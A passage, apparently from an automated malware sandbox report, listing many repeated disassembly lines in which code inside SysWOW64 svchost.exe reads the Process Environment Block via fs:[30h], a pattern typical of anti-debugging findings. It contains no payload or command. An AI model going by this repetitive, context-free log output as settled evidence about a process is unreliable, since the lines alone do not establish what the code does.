            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D678E mov eax, dword ptr fs:[00000030h]1_2_030D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]1_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E47A0 mov eax, dword ptr fs:[00000030h]1_2_030E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]1_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]1_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]1_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]1_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]1_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]1_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]1_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]1_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]1_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]1_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]1_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]1_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]1_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]1_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6500 mov eax, dword ptr fs:[00000030h]1_2_030C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov eax, dword ptr fs:[00000030h]1_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov ecx, dword ptr fs:[00000030h]1_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064588 mov eax, dword ptr fs:[00000030h]1_2_03064588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E59C mov eax, dword ptr fs:[00000030h]1_2_0306E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030365D0 mov eax, dword ptr fs:[00000030h]1_2_030365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030325E0 mov eax, dword ptr fs:[00000030h]1_2_030325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C427 mov eax, dword ptr fs:[00000030h]1_2_0302C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA456 mov eax, dword ptr fs:[00000030h]1_2_030EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302645D mov eax, dword ptr fs:[00000030h]1_2_0302645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305245A mov eax, dword ptr fs:[00000030h]1_2_0305245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC460 mov ecx, dword ptr fs:[00000030h]1_2_030BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA49A mov eax, dword ptr fs:[00000030h]1_2_030EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030364AB mov eax, dword ptr fs:[00000030h]1_2_030364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030644B0 mov ecx, dword ptr fs:[00000030h]1_2_030644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BA4B0 mov eax, dword ptr fs:[00000030h]1_2_030BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030304E5 mov ecx, dword ptr fs:[00000030h]1_2_030304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104B00 mov eax, dword ptr fs:[00000030h]1_2_03104B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB40 mov eax, dword ptr fs:[00000030h]1_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D8B42 mov eax, dword ptr fs:[00000030h]1_2_030D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028B50 mov eax, dword ptr fs:[00000030h]1_2_03028B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEB50 mov eax, dword ptr fs:[00000030h]1_2_030DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CB7E mov eax, dword ptr fs:[00000030h]1_2_0302CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]1_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]1_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]1_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEBD0 mov eax, dword ptr fs:[00000030h]1_2_030DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EBFC mov eax, dword ptr fs:[00000030h]1_2_0305EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BCBF0 mov eax, dword ptr fs:[00000030h]1_2_030BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BCA11 mov eax, dword ptr fs:[00000030h]1_2_030BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA24 mov eax, dword ptr fs:[00000030h]1_2_0306CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EA2E mov eax, dword ptr fs:[00000030h]1_2_0305EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]1_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]1_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]1_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]1_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEA60 mov eax, dword ptr fs:[00000030h]1_2_030DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]1_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]1_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104A80 mov eax, dword ptr fs:[00000030h]1_2_03104A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068A90 mov edx, dword ptr fs:[00000030h]1_2_03068A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]1_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]1_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086AA4 mov eax, dword ptr fs:[00000030h]1_2_03086AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030AD0 mov eax, dword ptr fs:[00000030h]1_2_03030AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]1_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]1_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]1_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]1_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]1_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]1_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC912 mov eax, dword ptr fs:[00000030h]1_2_030BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]1_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]1_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B892A mov eax, dword ptr fs:[00000030h]1_2_030B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C892B mov eax, dword ptr fs:[00000030h]1_2_030C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0946 mov eax, dword ptr fs:[00000030h]1_2_030B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104940 mov eax, dword ptr fs:[00000030h]1_2_03104940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
